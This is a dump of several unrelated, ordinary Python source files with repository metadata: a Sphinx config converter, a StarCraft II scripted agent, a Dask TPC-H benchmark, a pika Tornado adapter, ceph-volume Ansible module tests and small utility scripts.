| null | null | null | """A small sphinx extension to let you configure a site with YAML metadata."""
from pathlib import Path
# Transform a "Jupyter Book" YAML configuration file into a Sphinx configuration file.
# This is so that we can choose more user-friendly words for things than Sphinx uses.
# e.g., 'logo' instead of 'html_logo'.
# Note that this should only be used for **top level** keys.
PATH_YAML_DEFAULT = Path(__file__).parent.joinpath("default_config.yml")
def yaml_to_sphinx(yaml):
"""Convert a Jupyter Book style config structure into a Sphinx config dict."""
sphinx_config = {
"exclude_patterns": [
"_build",
"Thumbs.db",
".DS_Store",
"**.ipynb_checkpoints",
],
}
# Start with an empty options block
theme_options = {}
# Launch button configuration
launch_buttons_config = yaml.get("launch_buttons", {})
repository_config = yaml.get("repository", {})
theme_options["launch_buttons"] = launch_buttons_config
theme_options["path_to_docs"] = repository_config.get("path_to_book", "")
theme_options["repository_url"] = repository_config.get("url", "")
theme_options["repository_branch"] = repository_config.get("branch", "")
# HTML
html = yaml.get("html")
if html:
sphinx_config["html_favicon"] = html.get("favicon", "")
sphinx_config["html_baseurl"] = html.get("baseurl", "")
theme_options["google_analytics_id"] = html.get("google_analytics_id", "")
# Deprecate navbar_footer_text after a release cycle
theme_options["navbar_footer_text"] = html.get("navbar_footer_text", "")
theme_options["extra_navbar"] = html.get("extra_navbar", "")
theme_options["extra_footer"] = html.get("extra_footer", "")
theme_options["home_page_in_toc"] = html.get("home_page_in_navbar")
# Comments config
sphinx_config["comments_config"] = html.get("comments", {})
# Pass through the buttons
btns = ["use_repository_button", "use_edit_page_button", "use_issues_button"]
use_buttons = {btn: html.get(btn) for btn in btns if html.get(btn) is not None}
if any(use_buttons.values()):
if not repository_config.get("url"):
raise ValueError(
"To use 'repository' buttons, you must specify the repository URL"
)
# Update our config
theme_options.update(use_buttons)
# Update the theme options in the main config
sphinx_config["html_theme_options"] = theme_options
execute = yaml.get("execute")
if execute:
if execute.get("execute_notebooks") is False:
# Special case because YAML treats `off` as "False".
execute["execute_notebooks"] = "off"
sphinx_config["jupyter_execute_notebooks"] = execute.get(
"execute_notebooks", "auto"
)
sphinx_config["execution_timeout"] = execute.get("timeout", 30)
sphinx_config["jupyter_cache"] = execute.get("cache", "")
_recursive_update(
sphinx_config,
{"execution_excludepatterns": execute.get("exclude_patterns", [])},
)
# LaTeX
latex = yaml.get("latex")
if latex:
sphinx_config["latex_engine"] = latex.get("latex_engine", "pdflatex")
# Extra extensions
extra_extensions = yaml.get("sphinx", {}).get("extra_extensions")
if extra_extensions:
if not isinstance(extra_extensions, list):
extra_extensions = [extra_extensions]
extensions = sphinx_config.get("extensions", [])
for extra in extra_extensions:
extensions.append(extra)
sphinx_config["extensions"] = extensions
# Files that we wish to skip
sphinx_config["exclude_patterns"].extend(yaml.get("exclude_patterns", []))
# Now do simple top-level translations
YAML_TRANSLATIONS = {
"logo": "html_logo",
"title": "html_title",
"execute_notebooks": "jupyter_execute_notebooks",
"project": "project",
"author": "author",
"copyright": "copyright",
}
for key, newkey in YAML_TRANSLATIONS.items():
if key in yaml:
val = yaml.get(key)
if val is None:
val = ""
sphinx_config[newkey] = val
return sphinx_config
def _recursive_update(config, update):
"""Update the dict `config` with `update` recursively.
This *updates* nested dicts / lists instead of replacing them.
"""
for key, val in update.items():
if isinstance(config.get(key), dict):
config[key].update(val)
elif isinstance(config.get(key), list):
if isinstance(val, list):
config[key].extend(val)
else:
config[key] = val
else:
config[key] = val
| 37.083969 | 87 | 0.628036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,037 | 0.419308 |
9efb34b3c08bdbb3ec7a611587c6c1763f510bd0 | 5,759 | py | Python | ScriptedAgent.py | RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II | 17171fc95c8385920ab7cab80bd4681ce1bff799 | [
"Apache-2.0"
]
| null | null | null | ScriptedAgent.py | RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II | 17171fc95c8385920ab7cab80bd4681ce1bff799 | [
"Apache-2.0"
]
| null | null | null | ScriptedAgent.py | RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II | 17171fc95c8385920ab7cab80bd4681ce1bff799 | [
"Apache-2.0"
]
| null | null | null | __author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
# scripted agents taken from PySC2, credits to DeepMind
# https://github.com/deepmind/pysc2/blob/master/pysc2/agents/scripted_agent.py
import numpy as np
import uuid
from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
_SCREEN_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_SCREEN_SELECTED = features.SCREEN_FEATURES.selected.index
_PLAYER_FRIENDLY = 1
_PLAYER_NEUTRAL = 3
_PLAYER_HOSTILE = 4
_NO_OP = actions.FUNCTIONS.no_op.id
_MOVE_SCREEN = actions.FUNCTIONS.Move_screen.id
_ATTACK_SCREEN = actions.FUNCTIONS.Attack_screen.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_NOT_QUEUED = [0]
_SELECT_ALL = [0]
class ScriptedAgent(base_agent.BaseAgent):
def step(self, obs):
super(ScriptedAgent, self).step(obs)
# we expand dims because keras wants 4 dims for convolutions
# observation = np.expand_dims(obs.observation["screen"][_SCREEN_PLAYER_RELATIVE], axis=3)
screens = [obs.observation["screen"][_SCREEN_PLAYER_RELATIVE],
obs.observation["screen"][_SCREEN_SELECTED]]
observation = np.stack(screens, axis=2)
if self.game == "beacon":
if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
neutral_y, neutral_x = (player_relative == 3).nonzero()
if not neutral_y.any():
action = _NO_OP
params = []
else:
target = [int(neutral_x.mean()), int(neutral_y.mean())]
action = _MOVE_SCREEN
params = [[0], target]
else:
action = _SELECT_ARMY
params = [[0]]
elif self.game == "mineral":
if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
neutral_y, neutral_x = (player_relative == 3).nonzero()
player_y, player_x = (player_relative == 1).nonzero()
if not neutral_y.any() or not player_y.any():
action = _NO_OP
params = []
else:
action = _MOVE_SCREEN
index_x = np.argmin(neutral_x)
index_y = np.argmin(neutral_y)
index = index_x if neutral_x[index_x] + neutral_y[index_x] < neutral_x[index_y] + neutral_y[index_y] else index_y
target = [neutral_x[index], neutral_y[index]]
params = [[0], target]
else:
action = _SELECT_ARMY
params = [[0]]
elif self.game == "minerals":
if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
neutral_y, neutral_x = (player_relative == 3).nonzero()
player_y, player_x = (player_relative == 1).nonzero()
if not neutral_y.any() or not player_y.any():
action = _NO_OP
params = []
else:
player = [int(player_x.mean()), int(player_y.mean())]
closest, min_dist = None, None
for p in zip(neutral_x, neutral_y):
dist = np.linalg.norm(np.array(player) - np.array(p))
if not min_dist or dist < min_dist:
closest, min_dist = p, dist
action = _MOVE_SCREEN
params = [[0], closest]
else:
action = _SELECT_ARMY
params = [[0]]
elif self.game == "roaches":
if _ATTACK_SCREEN in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
roach_y, roach_x = (player_relative == _PLAYER_HOSTILE).nonzero()
if not roach_y.any():
action = _NO_OP
params = [_NOT_QUEUED]
else:
index = np.argmax(roach_y)
target = [roach_x[index], roach_y[index]]
action = _ATTACK_SCREEN
params = [_NOT_QUEUED, target]
elif _SELECT_ARMY in obs.observation["available_actions"]:
action = _SELECT_ARMY
params = [_SELECT_ALL]
else:
action = _NO_OP
params = [_NOT_QUEUED]
self.states.append(np.array([observation, obs.observation["available_actions"], action, params]))
if len(self.states) == 64:
new_file_name = str(uuid.uuid1())
np.save("dataset_{}/{}".format(self.game, new_file_name), np.array(self.states))
self.states = []
return actions.FunctionCall(action, params)
class AgentRoaches(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "roaches"
self.states = []
class AgentBeacon(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "beacon"
self.states = []
class AgentMineral(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "mineral"
self.states = []
class AgentMinerals(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "minerals"
self.states = []
| 39.445205 | 133 | 0.576489 | 5,007 | 0.869422 | 0 | 0 | 0 | 0 | 0 | 0 | 576 | 0.100017 |
9efb77347037fbe157767ce33cce2fb416895aa6 | 5,602 | py | Python | benchmark/test_tpch.py | serverless-analytics/dask-distributed-vanilla | b4b135ee956dbf9e64d10712558a88eafa080675 | [
"BSD-3-Clause"
]
| null | null | null | benchmark/test_tpch.py | serverless-analytics/dask-distributed-vanilla | b4b135ee956dbf9e64d10712558a88eafa080675 | [
"BSD-3-Clause"
]
| null | null | null | benchmark/test_tpch.py | serverless-analytics/dask-distributed-vanilla | b4b135ee956dbf9e64d10712558a88eafa080675 | [
"BSD-3-Clause"
]
| null | null | null | import time
import sys
import dask
from dask.distributed import (
wait,
futures_of,
Client,
)
from tpch import loaddata, queries
#from benchmarks import utils
# Paths or URLs to the TPC-H tables.
#table_paths = {
# 'CUSTOMER': 'hdfs://bu-23-115:9000/tpch/customer.tbl',
# 'LINEITEM': 'hdfs://bu-23-115:9000/tpch/lineitem.tbl',
# 'NATION': 'hdfs://bu-23-115:9000/tpch/nation.tbl',
# 'ORDERS': 'hdfs://bu-23-115:9000/tpch/orders.tbl',
# 'PART': 'hdfs://bu-23-115:9000/tpch/part.tbl',
# 'PARTSUPP': 'hdfs://bu-23-115:9000/tpch/partsupp.tbl',
# 'REGION': 'hdfs://bu-23-115:9000/tpch/region.tbl',
# 'SUPPLIER': 'hdfs://bu-23-115:9000/tpch/supplier.tbl',
#}
table_paths = {
'CUSTOMER': '/root/2g/customer.tbl',
'LINEITEM': '/root/2g/lineitem.tbl',
'NATION': '/root/2g/nation.tbl',
'ORDERS': '/root/2g/orders.tbl',
'PART': '/root/2g/part.tbl',
'PARTSUPP': '/root/2g/partsupp.tbl',
'REGION': '/root/2g/region.tbl',
'SUPPLIER': '/root/2g/supplier.tbl',
}
#table_paths = {
# 'CUSTOMER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/customer.tbl',
# 'LINEITEM': 'https://gochaudhstorage001.blob.core.windows.net/tpch/lineitem.tbl',
# 'NATION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/nation.tbl',
# 'ORDERS': 'https://gochaudhstorage001.blob.core.windows.net/tpch/orders.tbl',
# 'PART': 'https://gochaudhstorage001.blob.core.windows.net/tpch/part.tbl',
# 'PARTSUPP': 'https://gochaudhstorage001.blob.core.windows.net/tpch/partsupp.tbl',
# 'REGION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/region.tbl',
# 'SUPPLIER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/supplier.tbl',
#}
def main():
if len(sys.argv) < 2:
print("args: <dask client>")
return 1
client = Client(sys.argv[1])
timing_supported = False
# set to False if running against upstream dask without our code changes.
benchmarker = TpchBenchmarkManager(client, timing_supported)
benchmarker.load_tables(
part_path = table_paths['PART'],
supplier_path = table_paths['SUPPLIER'],
partsupp_path = table_paths['PARTSUPP'],
customer_path = table_paths['CUSTOMER'],
orders_path = table_paths['ORDERS'],
lineitem_path = table_paths['LINEITEM'],
nation_path = table_paths['NATION'],
region_path = table_paths['REGION'],
)
# Choose what queries you want to run here.
benchmarker.run_query(1)
#benchmarker.run_query(3)
#benchmarker.run_query(6)
#benchmarker.run_query(21)
class TpchBenchmarkManager:
def __init__(self, client, timing_supported=True):
self.client = client
self.timing_supported = timing_supported
self.tables = {}
def load_tables(self,
*,
# Paths/URLs for TPCH tables source data.
part_path=None,
supplier_path=None,
partsupp_path=None,
customer_path=None,
orders_path=None,
lineitem_path=None,
nation_path=None,
region_path=None,
):
paths = {
'PART': part_path,
'SUPPLIER': supplier_path,
'PARTSUPP': partsupp_path,
'CUSTOMER': customer_path,
'ORDERS': orders_path,
'LINEITEM': lineitem_path,
'NATION': nation_path,
'REGION': region_path,
}
for tablename, path in paths.items():
if path is None:
print("\nNo path given for table {}. Skipping.".format(tablename))
continue
print("\n====================================")
print("Ingesting table {}... \n(from {})".format(tablename, path))
load_start = time.time()
table = loaddata.loader[tablename](path)
#table = self.client.persist(table)
#wait(table)
load_duration = time.time() - load_start
self.tables[tablename] = table
futures = futures_of(table)
print("...complete.")
print("\nE2E time: {:.3f} seconds. Number of partitions: {}".format(
load_duration, len(futures)))
print("====================================\n")
if self.timing_supported:
longest_future = None
longest_future_duration = None
for future in futures:
duration = self.client.timing_info(future)[0]['duration']
if longest_future is None or duration > longest_future_duration:
longest_future = future
longest_future_duration = duration
print("Profile of slowest partition:")
#utils.prettyprint_timing_info(self.client.timing_info(longest_future))
def run_query(self, query_num):
print("\n====================================")
print("Executing query {}...".format(query_num))
query_start = time.time()
futures = queries.by_number[query_num](self.tables)
future = self.client.compute(futures)
result = self.client.gather(future)
query_duration = time.time() - query_start
print("...complete.")
print("\nE2E time: {:.3f} seconds.".format(query_duration))
if self.timing_supported:
try:
utils.prettyprint_timing_info(self.client.timing_info(future))
except Exception as e:
print(str(e))
print(result)
return future
if __name__ == '__main__':
main()
| 35.0125 | 87 | 0.593181 | 2,959 | 0.528204 | 0 | 0 | 0 | 0 | 0 | 0 | 2,362 | 0.421635 |
9efc2be79705e76de2137bab964886217cb24983 | 3,582 | py | Python | pika/adapters/tornado_connection.py | hugovk/pika | 03542ef616a2a849e8bfb0845427f50e741ea0c6 | [
"BSD-3-Clause"
]
| 1 | 2019-08-28T10:10:56.000Z | 2019-08-28T10:10:56.000Z | pika/adapters/tornado_connection.py | goupper/pika | e2f26db4f41ac7ea6bdc50964a766472460dce4a | [
"BSD-3-Clause"
]
| null | null | null | pika/adapters/tornado_connection.py | goupper/pika | e2f26db4f41ac7ea6bdc50964a766472460dce4a | [
"BSD-3-Clause"
]
| null | null | null | """Use pika with the Tornado IOLoop
"""
import logging
from tornado import ioloop
from pika.adapters.utils import nbio_interface, selector_ioloop_adapter
from pika.adapters import base_connection
LOGGER = logging.getLogger(__name__)
class TornadoConnection(base_connection.BaseConnection):
"""The TornadoConnection runs on the Tornado IOLoop.
"""
def __init__(self,
parameters=None,
on_open_callback=None,
on_open_error_callback=None,
on_close_callback=None,
custom_ioloop=None,
internal_connection_workflow=True):
"""Create a new instance of the TornadoConnection class, connecting
to RabbitMQ automatically
:param pika.connection.Parameters parameters: Connection parameters
:param on_open_callback: The method to call when the connection is open
:type on_open_callback: method
:param None | method on_open_error_callback: Called if the connection
can't be established or connection establishment is interrupted by
`Connection.close()`: on_open_error_callback(Connection, exception).
:param None | method on_close_callback: Called when a previously fully
open connection is closed:
`on_close_callback(Connection, exception)`, where `exception` is
either an instance of `exceptions.ConnectionClosed` if closed by
user or broker or exception of another type that describes the cause
of connection failure.
:param None | ioloop.IOLoop |
nbio_interface.AbstractIOServices custom_ioloop:
Override using the global IOLoop in Tornado
:param bool internal_connection_workflow: True for autonomous connection
establishment which is default; False for externally-managed
connection workflow via the `create_connection()` factory.
"""
if isinstance(custom_ioloop, nbio_interface.AbstractIOServices):
nbio = custom_ioloop
else:
nbio = (
selector_ioloop_adapter.SelectorIOServicesAdapter(
custom_ioloop or ioloop.IOLoop.instance()))
super(TornadoConnection, self).__init__(
parameters,
on_open_callback,
on_open_error_callback,
on_close_callback,
nbio,
internal_connection_workflow=internal_connection_workflow)
@classmethod
def create_connection(cls,
connection_configs,
on_done,
custom_ioloop=None,
workflow=None):
"""Implement
:py:classmethod:`pika.adapters.BaseConnection.create_connection()`.
"""
nbio = selector_ioloop_adapter.SelectorIOServicesAdapter(
custom_ioloop or ioloop.IOLoop.instance())
def connection_factory(params):
"""Connection factory."""
if params is None:
raise ValueError('Expected pika.connection.Parameters '
'instance, but got None in params arg.')
return cls(
parameters=params,
custom_ioloop=nbio,
internal_connection_workflow=False)
return cls._start_connection_workflow(
connection_configs=connection_configs,
connection_factory=connection_factory,
nbio=nbio,
workflow=workflow,
on_done=on_done)
| 38.934783 | 80 | 0.634283 | 3,341 | 0.932719 | 0 | 0 | 1,079 | 0.301228 | 0 | 0 | 1,623 | 0.453099 |
9efe36b7df749158058e0d954855a509a9ce6a8b | 7,057 | py | Python | tests/library/test_ceph_volume_simple_activate.py | u-kosmonaft-u/ceph-ansible | 14c472707c165f77def05826b22885480af3e8f9 | [
"Apache-2.0"
]
| 1,570 | 2015-01-03T08:38:22.000Z | 2022-03-31T09:24:37.000Z | tests/library/test_ceph_volume_simple_activate.py | u-kosmonaft-u/ceph-ansible | 14c472707c165f77def05826b22885480af3e8f9 | [
"Apache-2.0"
]
| 4,964 | 2015-01-05T10:41:44.000Z | 2022-03-31T07:59:49.000Z | tests/library/test_ceph_volume_simple_activate.py | u-kosmonaft-u/ceph-ansible | 14c472707c165f77def05826b22885480af3e8f9 | [
"Apache-2.0"
]
| 1,231 | 2015-01-04T11:48:16.000Z | 2022-03-31T12:15:28.000Z | from mock.mock import patch
import os
import pytest
import ca_test_common
import ceph_volume_simple_activate
fake_cluster = 'ceph'
fake_container_binary = 'podman'
fake_container_image = 'quay.ceph.io/ceph/daemon:latest'
fake_id = '42'
fake_uuid = '0c4a7eca-0c2a-4c12-beff-08a80f064c52'
fake_path = '/etc/ceph/osd/{}-{}.json'.format(fake_id, fake_uuid)
class TestCephVolumeSimpleActivateModule(object):
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
def test_with_check_mode(self, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid,
'_ansible_check_mode': True
})
m_exit_json.side_effect = ca_test_common.exit_json
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert not result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid]
assert result['rc'] == 0
assert not result['stdout']
assert not result['stderr']
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_with_failure(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = 'error'
rc = 2
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid]
assert result['rc'] == rc
assert result['stderr'] == stderr
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_all_osds(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_all': True
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', '--all']
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
@patch.object(os.path, 'exists', return_value=True)
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_path_exists(self, m_run_command, m_exit_json, m_os_path):
ca_test_common.set_module_args({
'path': fake_path
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', '--file', fake_path]
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
@patch.object(os.path, 'exists', return_value=False)
@patch('ansible.module_utils.basic.AnsibleModule.fail_json')
def test_activate_path_not_exists(self, m_fail_json, m_os_path):
ca_test_common.set_module_args({
'path': fake_path
})
m_fail_json.side_effect = ca_test_common.fail_json
with pytest.raises(ca_test_common.AnsibleFailJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['msg'] == '{} does not exist'.format(fake_path)
assert result['rc'] == 1
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_without_systemd(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid,
'systemd': False
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid, '--no-systemd']
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
@patch.dict(os.environ, {'CEPH_CONTAINER_BINARY': fake_container_binary})
@patch.dict(os.environ, {'CEPH_CONTAINER_IMAGE': fake_container_image})
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_with_container(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid,
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == [fake_container_binary,
'run', '--rm', '--privileged',
'--ipc=host', '--net=host',
'-v', '/etc/ceph:/etc/ceph:z',
'-v', '/var/lib/ceph/:/var/lib/ceph/:z',
'-v', '/var/log/ceph/:/var/log/ceph/:z',
'-v', '/run/lvm/:/run/lvm/',
'-v', '/run/lock/lvm/:/run/lock/lvm/',
'--entrypoint=ceph-volume', fake_container_image,
'--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid]
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
| 40.325714 | 132 | 0.621794 | 6,700 | 0.949412 | 0 | 0 | 6,609 | 0.936517 | 0 | 0 | 1,686 | 0.238912 |
9effc7a4839375e16dbdf0896beb3c70b1e21234 | 154 | py | Python | setup.py | Minterious/minter-monitoring | 1a2216be57dec491a970950c3b9cfc72cea228c2 | [
"MIT"
]
| 2 | 2019-08-24T12:15:20.000Z | 2019-08-24T12:19:07.000Z | setup.py | Minterious/minter-monitoring | 1a2216be57dec491a970950c3b9cfc72cea228c2 | [
"MIT"
]
| null | null | null | setup.py | Minterious/minter-monitoring | 1a2216be57dec491a970950c3b9cfc72cea228c2 | [
"MIT"
]
| 1 | 2019-09-19T21:16:25.000Z | 2019-09-19T21:16:25.000Z | import setuptools
setuptools.setup(
name='mintermonitoring',
version='1.0.0',
packages=setuptools.find_packages(include=['mintermonitoring'])
)
| 19.25 | 66 | 0.746753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 43 | 0.279221 |
7300890aeb852238c2f50f2aafaca22c70ba3108 | 158 | py | Python | Python/Back_solve_python/back_joon/StringArray/P10808.py | skyriv213/Studyriv | 6dfd3c52a873cd3bdb018280d81aec8bdcf61e6e | [
"MIT"
]
| null | null | null | Python/Back_solve_python/back_joon/StringArray/P10808.py | skyriv213/Studyriv | 6dfd3c52a873cd3bdb018280d81aec8bdcf61e6e | [
"MIT"
]
| null | null | null | Python/Back_solve_python/back_joon/StringArray/P10808.py | skyriv213/Studyriv | 6dfd3c52a873cd3bdb018280d81aec8bdcf61e6e | [
"MIT"
]
| null | null | null | s = input()
num = [0] * 26
for i in range(len(s)):
num[ord(s[i])-97] += 1
for i in num:
print(i, end = " ")
if i == len(num)-1:
print(i)
| 15.8 | 26 | 0.455696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.018987 |
73009bb6994a5ff455eca19ffc1b698f9cf1d1d2 | 600 | py | Python | src/reliefcpp/utils.py | ferrocactus/reliefcpp | 41705a9e5c749e700f83f9fe9f352457ae57426d | [
"MIT"
]
| null | null | null | src/reliefcpp/utils.py | ferrocactus/reliefcpp | 41705a9e5c749e700f83f9fe9f352457ae57426d | [
"MIT"
]
| null | null | null | src/reliefcpp/utils.py | ferrocactus/reliefcpp | 41705a9e5c749e700f83f9fe9f352457ae57426d | [
"MIT"
]
| null | null | null | from enum import Enum
from numpy import isin
class Metric(Enum):
EUCLIDEAN = 0
MANHATTAN = 1
HAMMING = 2
L2 = 3
L1 = 4
metric_names = [
"euclidean",
"manhattan",
"hamming",
"l2",
"l1"
]
def _validate_metric(metric_name):
if isinstance(metric_name, Metric):
return metric_name.value
elif isinstance(metric_name, str):
metric_name = metric_name.lower()
return metric_names.index(metric_name)
elif isinstance(metric_name, int):
return metric_name
else:
raise ValueError("Could not identify metric.")
| 18.181818 | 54 | 0.638333 | 93 | 0.155 | 0 | 0 | 0 | 0 | 0 | 0 | 67 | 0.111667 |
7300c97c38a22ec9df0ea9ea6a865bb5bd5120e7 | 1,993 | py | Python | utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py | jmfinelli/JavaNeuralDecompiler | fb914fcf4518815a4d00061b562617fc25e2f2b4 | [
"Apache-2.0"
]
| 1 | 2021-06-30T12:50:28.000Z | 2021-06-30T12:50:28.000Z | utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py | jmfinelli/JavaNeuralDecompiler | fb914fcf4518815a4d00061b562617fc25e2f2b4 | [
"Apache-2.0"
]
| null | null | null | utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py | jmfinelli/JavaNeuralDecompiler | fb914fcf4518815a4d00061b562617fc25e2f2b4 | [
"Apache-2.0"
]
| null | null | null | import pandas as pd
import os.path
length_switch = True
max_body_length = 50
process_candidates = os.path.exists('./datasets/candidates.output')
x_train = open('./datasets/x_train').readlines()
x_train = [x.rstrip('\n') for x in x_train]
y_train = open('./datasets/y_train').readlines()
y_train = [x.rstrip('\n') for x in y_train]
x_valid = open('./datasets/x_valid').readlines()
x_valid = [x.rstrip('\n') for x in x_valid]
y_valid = open('./datasets/y_valid').readlines()
y_valid = [x.rstrip('\n') for x in y_valid]
bytecodes = open('./datasets/bytecode.output').readlines()
bytecodes = [x.rstrip('\n') for x in bytecodes]
references = open('./datasets/references.output').readlines()
references = [x.rstrip('\n') for x in references]
if (process_candidates):
candidates = open('./datasets/candidates.output').readlines()
candidates = [x.rstrip('\n') for x in candidates]
df_pairs = pd.DataFrame({'source': bytecodes, 'target' : references, 'candidates': candidates })
else:
df_pairs = pd.DataFrame({'source': bytecodes, 'target': references })
if (length_switch):
mask = df_pairs['source'].apply(lambda x: len(x.split()) <= max_body_length)
df_pairs = df_pairs.loc[mask]
df_train = pd.DataFrame({'source': x_train + x_valid, 'target' : y_train + y_valid })
df_valid = df_pairs.merge(df_train, on='source', indicator=True, how='left')\
.query('_merge=="left_only"')\
.drop('_merge', axis=1)\
.drop('target_y', axis=1)
# df_valid = df_valid.sample(frac=1).reset_index(drop=True).sample(50000)
with open('./datasets/remaining_sources', 'w') as filehandle:
filehandle.writelines("%s\n" % place for place in df_valid['source'])
with open('./datasets/remaining_references', 'w') as filehandle:
filehandle.writelines("%s\n" % place for place in df_valid['target_x'])
if (process_candidates):
with open('./datasets/remaining_candidates', 'w') as filehandle:
filehandle.writelines("%s\n" % place for place in df_valid['candidates']) | 39.078431 | 100 | 0.697441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 573 | 0.287506 |
7303a20740842e72c83f9691beba5498f652855d | 105 | py | Python | py/Utility.GetData.py | mathematicalmichael/SpringNodes | 3ff4034b6e57ee6efa55c963e1819f3d30a2c4ab | [
"MIT"
]
| 51 | 2015-09-25T09:30:57.000Z | 2022-01-19T14:16:44.000Z | py/Utility.GetData.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
"MIT"
]
| 66 | 2015-09-30T02:43:32.000Z | 2022-03-31T02:26:52.000Z | py/Utility.GetData.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
"MIT"
]
| 48 | 2015-11-19T01:34:47.000Z | 2022-02-25T17:26:48.000Z | import System
dataKey, _ = IN
OUT = System.AppDomain.CurrentDomain.GetData("_Dyn_Wireless_%s" % dataKey) | 26.25 | 74 | 0.780952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.171429 |
7303be01ae89f9c41f09c1617f6cea31c52d0cf4 | 347 | py | Python | codes_/1189_Maximum_Number_of_Balloons.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
]
| null | null | null | codes_/1189_Maximum_Number_of_Balloons.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
]
| null | null | null | codes_/1189_Maximum_Number_of_Balloons.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
]
| null | null | null | # %% [1189. *Maximum Number of Balloons](https://leetcode.com/problems/maximum-number-of-balloons/)
